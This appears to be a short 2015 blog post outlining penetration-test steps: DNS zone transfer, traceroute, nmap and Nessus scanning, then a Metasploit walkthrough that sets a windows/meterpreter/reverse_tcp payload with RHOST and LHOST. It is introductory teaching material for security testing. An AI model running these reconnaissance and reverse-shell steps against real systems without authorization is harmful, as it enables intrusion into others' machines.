Tuesday, September 8, 2015

Process of Pentest

Information Gathering
----------------------------
DNS Zone Transfer
Step 1: nslookup (target ip/domain name)
Step 2: kali linux->dig axfr @ipaddr/domain name

Trace Route
Step 1: traceroute ipaddr

Port Scanning
Step 1: nmap ipaddr

Vulnerability Scanning
------------------------------
Step 1: Nessus to scan for vulnerability

Exploitation
-------------------
Step 1: Kali Linux: msfconsole (Metasploit)
Step 2: Search library for vulnerability -> search (vulnerability)
Step 3: Choose Weapon -> use (path of the library)
Step 4: Communication between host -> set payload windows/meterpreter/reverse_tcp
Step 5: To show all settings -> show options
Step 6: set target ip address -> set RHOST ip addr
Step 7: set your host ip address -> set LHOST ipaddr
Step 8: to perform exploitation -> run/exploit



No comments:

Post a Comment